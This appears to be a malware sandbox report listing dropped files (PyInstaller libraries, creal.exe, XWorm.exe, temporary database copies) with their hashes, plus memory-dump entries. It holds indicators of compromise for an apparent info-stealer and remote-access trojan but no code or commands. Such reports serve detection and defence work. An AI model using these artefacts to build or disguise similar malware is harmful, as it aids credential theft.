23cd846a654b6ebd557bb261c02664afda7a46980bf9033d0ad40c4730a98eaf266ce9846f6fd64ee3fc871626cda2f596ead66451cab94972565753627ff911

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\_ssl.pyd

Filesize
151KB

MD5
ce0ef7db1b5ec4211c901ef0ccc4c168

SHA1
da92022e89b5c6e4d7b0ce704cfba1ba0f50d20e

SHA256
bbcc8078d2624506bd33ed25a64230f9be74e7ff87faef517ab28e2f63f5e77a

SHA512
0c50bb2d47b0252419a1f7d58512cf2bdfc024b3f9dbbd44cd989d6e9e5d493631404b251afe0ce888ff61ed45c29c378b94801660d0429368df902f2eebb481

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\base_library.zip

Filesize
824KB

MD5
fae21bd1569fa2a63fb4b7a16e777208

SHA1
98e03e2ccb2425ca112ad20db949f763beb38611

SHA256
dbb6ff0ef96b8d93555d669f8f4775a9852156c6b3c1574a4cee4f6d2ad8f975

SHA512
68139b79a2026dd1d9bbb1eb73780abe5660d1efbda7870b557baabcbb46817b25958701725f122bfa3226c377559fa159ac9ec7dbdfbbd05401c644059703fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\certifi\cacert.pem

Filesize
284KB

MD5
181ac9a809b1a8f1bc39c1c5c777cf2a

SHA1
9341e715cea2e6207329e7034365749fca1f37dc

SHA256
488ba960602bf07cc63f4ef7aec108692fec41820fc3328a8e3f3de038149aee

SHA512
e19a92b94aedcf1282b3ef561bd471ea19ed361334092c55d72425f9183ebd1d30a619e493841b6f75c629f26f28dc682960977941b486c59475f21cf86fff85

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\charset_normalizer\md.cp38-win_amd64.pyd

Filesize
10KB

MD5
38105df780eddd734027328e0dca0ca3

SHA1
45f1d9e3472478f8e1ba86675f5c81c00b183bea

SHA256
9512896233d2119e78e2e1fcfd83643b2be2b427f08d16fc568fe98b9d4913cb

SHA512
ba2a05c236ce47d87888f618be2b23532d0d882578707b07ae220a96883b468f7088a19ebbe3bac2adf4035da6b7ee6fa9e57b620e2bc67b28e54cd969d6bbb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\charset_normalizer\md__mypyc.cp38-win_amd64.pyd

Filesize
116KB

MD5
073f09e1edf5ec4173ce2de1121b9dd1

SHA1
6cdb2559a1b706446cdd993e6fd680095e119b2e

SHA256
7412969bfe1bca38bbb25bab02b54506a05015a4944b54953fcfdb179ec3f13c

SHA512
70a1a766001ec78a5fce7eadf6cae07f11b3ca6b08115e130c77d024524879577ccab263c596102102b1569933c601592fbb5ee07c7db123bb850965ef8e8e96

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\libcrypto-1_1.dll

Filesize
3.2MB

MD5
89511df61678befa2f62f5025c8c8448

SHA1
df3961f833b4964f70fcf1c002d9fd7309f53ef8

SHA256
296426e7ce11bc3d1cfa9f2aeb42f60c974da4af3b3efbeb0ba40e92e5299fdf

SHA512
9af069ea13551a4672fdd4635d3242e017837b76ab2815788148dd4c44b4cf3a650d43ac79cd2122e1e51e01fb5164e71ff81a829395bdb8e50bb50a33f0a668

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\libffi-7.dll

Filesize
32KB

MD5
eef7981412be8ea459064d3090f4b3aa

SHA1
c60da4830ce27afc234b3c3014c583f7f0a5a925

SHA256
f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081

SHA512
dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\libssl-1_1.dll

Filesize
674KB

MD5
50bcfb04328fec1a22c31c0e39286470

SHA1
3a1b78faf34125c7b8d684419fa715c367db3daa

SHA256
fddd0da02dcd41786e9aa04ba17ba391ce39dae6b1f54cfa1e2bb55bc753fce9

SHA512
370e6dfd318d905b79baf1808efbf6da58590f00006513bdaaed0c313f6fa6c36f634ea3b05f916cee59f4db25a23dd9e6f64caf3c04a200e78c193027f57685

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\pyexpat.pyd

Filesize
187KB

MD5
a9e03036e55c680004576490efa6a792

SHA1
8a1948f1ba8b4bb9e34f29eade786fc85949d74c

SHA256
70fe25f01eafbf730deb95fd101b220149bb2eeea690b24b20f6f4bcdb0f04ed

SHA512
fa664233ceaa848901d19091f01cbd3ada8dd1a30de352dca693c4394e243941405edb0fe09fc9fb404fe18a5455c78aa8ce64f7037e63ac9574c2aec5ee4267

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\python3.dll

Filesize
58KB

MD5
ff2c3e3b0becea495d9078a8a623c604

SHA1
c0ee5a5c5c758622386719da3cf6d11a320c804b

SHA256
031421c1061bd0fed1975dab16f67228b925302a74ceeda79324a9cdd943f32d

SHA512
5313132032c0eea338e0c8c6fdba68d694ab30ff908d0093c926e3744a2bfaf0a1cca13c305a4d5fcb01c1a20bb7f48654fd93218d30a04e34b6fcf0e308e675

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\python38.dll

Filesize
4.0MB

MD5
c381edf39a0c3ed74f1df4a44fbab4ba

SHA1
688af6616d5f2f67ff9f49dc6790583825fb82ab

SHA256
f8c622753feb3cec062a535f2a285b17f6d118fee0bf8ed5a2f3d06ca53e729d

SHA512
88abc4ef225593e176050a6526b4873c08aca3b464616b502e64e7995368e82ec413cdf9e0bc8902994b2be25aa0aaf2e5135977599e57a0e8e1809f2b67eeec

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\pywin32_system32\pythoncom38.dll

Filesize
691KB

MD5
597955a07be4ae08f3b09adbf996fa83

SHA1
3817e541646fd3cdd7a8256a1260f6edfe7dd0c0

SHA256
ddfc515aea27ec414cfc84bef385711c82f0618f482df9d262c490226d7fa9d7

SHA512
485efaecb8ea5b2d4644d9ab0927b636f7ab6d660da04b088e26452a28b5b11bccee9724cb625a7d5bde3fa5909aa32f3568909965439a06d3dfc0b7e345c941

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\pywin32_system32\pywintypes38.dll

Filesize
139KB

MD5
f60da44a33910eda70d838d7635d8fb1

SHA1
c35b4cf47349888384729386c74c374edb6f6ff3

SHA256
13934599ff931f97e8eac6106dc67d54609befd0b0e653b46f6c25b18830c572

SHA512
3c57ed384c23c89f99708bdf688ebd28629e84df8756e7b64dfa8b6e0b52beefb0c62de820f2c72e5679b7632279dcb414a781cfd2c5c9654d09d9da24fa17b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\select.pyd

Filesize
27KB

MD5
6e3e3565f98e23bee501c54a4b8833db

SHA1
a4c9ecbd00c774e210eb9216e03d7945b3406c2c

SHA256
71a2198c2f9c8cb117f3ea41dc96b9ae9899f64f21392778d1516986f72d434b

SHA512
359aac4a443a013f06295e1a370f89d4452ea75fd2d11776f4eccf605b59caf529baffdcc3cef3eeb59e44a42beaf927bed908b507ac479cccc870768a620fed

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\sqlite3.dll

Filesize
1.4MB

MD5
7bff7832f9e14b9765dc4a292e734db9

SHA1
53468eec966042756f42cdedfb5f694301a9731d

SHA256
3d9f46abd55fb2371c1e8d4fccafe98088732acee155c6245e34817124b887b2

SHA512
f84d493c2b0a4b58dcc8fc95adfefe0de792096fb7ee960b0fa5dd2fe4c4e76bda45976a34ea09369860b5f837542ba5d0dee32db15041f531625a94a6f287fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\unicodedata.pyd

Filesize
1.0MB

MD5
0a22c143ab1dbd20e6ed6a4cb5fe1e43

SHA1
2eb837eb204d7467caad4a82e7b9932553cc9011

SHA256
d0b8deabc7bc531c0c45f17ffc75c55b1ac9ff71347b74753096050eec6235db

SHA512
8a48246bbf1dfbae63aafca8bb9ae5c14c9dbb60dcc43a1030d7ea11033cba8d6e780ab9620eeadf303f5a3a9167bddec4b2fa23dbe526b95db5c297c9f688d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI24322\win32\win32api.pyd

Filesize
138KB

MD5
57be78d0f2a66700600266ebc86c9b3c

SHA1
a47987d476cb9c76698890405e0b65aa10e07169

SHA256
9ab2b3a63bf2d0ef5ff3412c0b000756677810f3aa60a10bf62bb92c9f9b6ee2

SHA512
98c2a2e48adfae6c7d3c7d6731e688a27fc1eb6675760ab44f78e4eedebf88b09e425d21baf5674d402f9cfc9d7ebc6d643f8c763c8db5f6b1f8bf83681c256c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iuz0ac0c.uin.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\creal.exe

Filesize
16.1MB

MD5
b25a92bdbed301fae7d1857629ef0c37

SHA1
8a8626af07230ee969afbac4fce8003090951bc8

SHA256
1ffd509b527ebe41daa3dcbb2becb17792d3a07c980308fb0f264c5ab3f6458e

SHA512
3c0d630445ca38482868730403a544b5b8b232f11016d0f04423872d7a90a4645fbc135ada45cb3f91b96762c3e94aa2132a00b60740264fe8954a34130327f9

Download Submit
C:\Users\Admin\AppData\Local\Tempcrdcvrucle.db

Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\Users\Admin\AppData\Local\Tempcrfexqlske.db

Filesize
46KB

MD5
8f5942354d3809f865f9767eddf51314

SHA1
20be11c0d42fc0cef53931ea9152b55082d1a11e

SHA256
776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea

SHA512
fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

Download Submit
C:\Users\Admin\AppData\Local\Tempcrqowcboqf.db

Filesize
100KB

MD5
cf7a291fa3c23b1fa0a0c003717ca899

SHA1
a8feadd23a73c1c7783b5e56ce951c84f97e3851

SHA256
fd821a883d1953d95a9e616db71d43071afde16947f331f523ce8ea20c39d139

SHA512
0dfffbc596515ac284f8ab8fac13f1bbb496223ee7d849e9b8976b6f75a5c257619010419c5e441b84a538a7409bf0cefaf5f7b65bc7736842030c10eef4856f

Download Submit
C:\Users\Admin\AppData\Local\Tempcrttuttjgd.db

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Tempcrxgvtbfjm.db

Filesize
20KB

MD5
42c395b8db48b6ce3d34c301d1eba9d5

SHA1
b7cfa3de344814bec105391663c0df4a74310996

SHA256
5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d

SHA512
7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

Download Submit
C:\Windows\XWorm.exe

Filesize
76KB

MD5
22a651585671941246f81eabab2cb188

SHA1
dcb70291a0efcf53506cb357b44aec24e9bc3f52

SHA256
5673aa81d09dc3c06b606e056e02b8488591620d7119e8e296fdec6994c7755e

SHA512
24f68d8a7961cde225a22c28515cd9bc3d3479243ba73ea9601faa323dbf657eb7ae77194d8b1cd52dae3d84b5604881d169dafdfbcfb8d02b22c030298aff7c

Download Submit
memory/2000-123-0x0000000000400000-0x000000000237D000-memory.dmp

Filesize
31.5MB

Download
memory/2636-214-0x00000233CE450000-0x00000233CE472000-memory.dmp

Filesize
136KB

Download
memory/2976-507-0x0000000001670000-0x000000000167C000-memory.dmp

Filesize
48KB

Download
memory/2976-447-0x0000000000D80000-0x0000000000D90000-memory.dmp

Filesize
64KB

Download
memory/2976-512-0x0000000001490000-0x000000000149E000-memory.dmp

Filesize
56KB

Download
memory/2976-534-0x000000001D360000-0x000000001D3EE000-memory.dmp

Filesize
568KB

Download
memory/3224-124-0x0000000000890000-0x00000000008AA000-memory.dmp

Filesize
104KB

Download
memory/4612-435-0x000001E756BB0000-0x000001E756C59000-memory.dmp

Filesize
676KB

Download
memory/4612-448-0x000001E756BB0000-0x000001E756C59000-memory.dmp

Filesize
676KB

Download
memory/4612-17-0x000001E72FAD0000-0x000001E7309B8000-memory.dmp

Filesize
14.9MB

Download
memory/4612-261-0x000001E74D200000-0x000001E74D3F4000-memory.dmp

Filesize
2.0MB

Download
memory/4612-14-0x00007FF8CE693000-0x00007FF8CE695000-memory.dmp

Filesize
8KB

Download
memory/4612-377-0x00007FF8CE693000-0x00007FF8CE695000-memory.dmp

Filesize
8KB

Download
memory/4612-497-0x000001E755800000-0x000001E7558B2000-memory.dmp

Filesize
712KB

Download
memory/4612-436-0x000001E7572A0000-0x000001E757408000-memory.dmp

Filesize
1.4MB

Download
memory/4612-496-0x000001E757B30000-0x000001E757E12000-memory.dmp

Filesize
2.9MB

Download
memory/4612-494-0x000001E7522D0000-0x000001E752352000-memory.dmp

Filesize
520KB

Download
memory/4612-495-0x000001E74EA70000-0x000001E74EA9C000-memory.dmp

Filesize
176KB

Download
memory/4784-275-0x0000026383C00000-0x0000026383C12000-memory.dmp

Filesize
72KB

Download
memory/4784-237-0x000002639C760000-0x000002639C7D6000-memory.dmp

Filesize
472KB

Download
memory/4784-238-0x0000026383D50000-0x0000026383DA0000-memory.dmp

Filesize
320KB

Download
memory/4784-239-0x0000026383DA0000-0x0000026383DBE000-memory.dmp

Filesize
120KB

Download
memory/4784-65-0x0000026381F20000-0x0000026381F60000-memory.dmp

Filesize
256KB

Download
memory/4784-274-0x0000026383BD0000-0x0000026383BDA000-memory.dmp

Filesize
40KB

Download